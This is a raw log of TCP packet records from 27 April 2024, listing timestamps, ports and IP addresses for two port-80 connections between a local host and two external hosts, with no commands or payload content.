Apr 27, 2024 02:19:30.457957029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.457999945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.458070993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:30.495105982 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.495146036 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.495289087 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.495289087 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.495349884 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.495408058 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.495445013 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.495496988 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.495533943 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.495587111 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.495624065 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.495661974 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.495682955 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.495712996 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.519543886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.519763947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.519932985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:30.560632944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.560673952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.560904026 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:30.592058897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.592113972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.592274904 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:30.654067993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.654134989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.654174089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.654294968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:30.669612885 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.669651985 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.669727087 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.669786930 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.669850111 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.672218084 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.672296047 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.672348022 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.672404051 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.672441006 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.672478914 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.672502041 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.672533989 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.699579000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:30.715722084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.715774059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.715926886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:30.757173061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.757401943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.757569075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:30.788626909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.788779974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.788855076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:30.841449976 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.841487885 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.841532946 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.841532946 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.841594934 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.841639042 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.843959093 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.844029903 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.844146967 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.844185114 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.844208002 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.844237089 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.844264984 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:30.844319105 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:30.849174976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.849214077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.849287987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:30.895020008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.911932945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.911973000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.912010908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.912029028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:30.912139893 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:30.953500032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.953540087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.953608036 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:30.983314991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.983356953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:30.983409882 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:31.013207912 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.013287067 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.013339043 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.013395071 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.013520956 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.013575077 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.016714096 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.016777992 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.017353058 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.017390013 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.017411947 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.017448902 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.017482996 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.017549992 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.044661045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.090210915 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:31.107342005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.107417107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.107455969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.107522964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:31.107523918 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:31.107523918 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:31.107558966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.107610941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:31.149141073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.149224997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:31.149245977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.149353027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.149390936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:31.149390936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:31.179111958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.179184914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.179318905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:31.179320097 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:31.184680939 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.184721947 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.184756994 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.184788942 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.184864044 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.184901953 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.184923887 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.184951067 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.188704014 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.188779116 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.188827991 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.188863993 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.188889027 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.188925982 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.188942909 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.188996077 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.285506964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.285676003 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:31.303330898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.303371906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.303389072 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:31.303437948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:31.303463936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.303549051 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:31.345359087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.345428944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:31.345660925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.345716000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:31.356852055 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.356893063 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.356944084 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.356967926 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.356967926 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.356998920 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.360898018 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.360960007 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.361001968 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.361041069 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.361064911 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.361097097 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.361124039 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.361177921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.361212969 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.361265898 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.480925083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.481065989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:31.498858929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.498900890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.499042988 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:31.499042988 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:31.527968884 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.528040886 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.528095007 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.528179884 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.528196096 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.528197050 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.528197050 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.528249979 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.532242060 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.532320023 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.532443047 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.532516003 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.532529116 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.532577991 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.532653093 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.532738924 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.532807112 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.532860994 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.540898085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.540961027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:31.541201115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.541261911 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:31.676568031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.676732063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:31.694812059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.694892883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:31.700037956 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.700118065 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.700134039 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.700195074 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.700469017 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.700526953 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.703797102 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.703855991 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.703881025 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.703932047 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.704257965 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.704315901 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.704462051 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.704474926 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.704520941 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.704997063 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.705053091 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.735747099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.735810041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:31.871880054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.871953011 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:31.872153044 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.872211933 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.872237921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.872284889 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.872554064 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.872601986 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.872641087 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.872689009 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.876827955 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.876847982 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.876884937 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.876904964 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.876914024 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.876951933 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.877289057 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.877331018 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.877360106 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.877401114 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.879162073 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:31.879215002 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:31.905158997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.905229092 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:31.905235052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.934653997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:31.934724092 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:32.044272900 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.044287920 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.044317961 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.044368029 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.044409037 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.048202038 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.048238993 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.048261881 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.048295021 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.048355103 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.048404932 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.048433065 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.048484087 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.048698902 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.048718929 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.048758030 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.048789024 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.067158937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:32.100512028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:32.100645065 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:32.130378962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:32.130403042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:32.130461931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:32.130507946 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:32.199577093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:32.215794086 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.215861082 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.215894938 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.215948105 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.215958118 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.216025114 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.216057062 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.216130018 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.219199896 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.219255924 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.219291925 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.219345093 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.219402075 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.219454050 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.220011950 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.220051050 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.220067978 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.220098019 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.295802116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:32.296005011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:32.296063900 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:32.325594902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:32.325659037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:32.325733900 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:32.387579918 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.387593031 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.387765884 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.387767076 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.391107082 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.391122103 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.391160965 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.391192913 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.391196012 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.391248941 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.391917944 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.391972065 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.391973019 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.392024040 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.395217896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:32.449569941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:32.491391897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:32.491432905 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:32.491575003 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:32.523051977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:32.523243904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:32.523293972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:32.559570074 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.559638023 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.559755087 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.559808969 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.562551022 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.562622070 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.562627077 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.562678099 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.562695026 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.562745094 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.563715935 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.563730001 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.563752890 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:32.563771009 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.563801050 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.563829899 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:32.646224976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:32.646466017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:32.646512985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:32.687186956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:32.687202930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:32.687257051 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:32.719546080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:32.719656944 CEST	80	49734	176.97.76.106	192.168.2.4
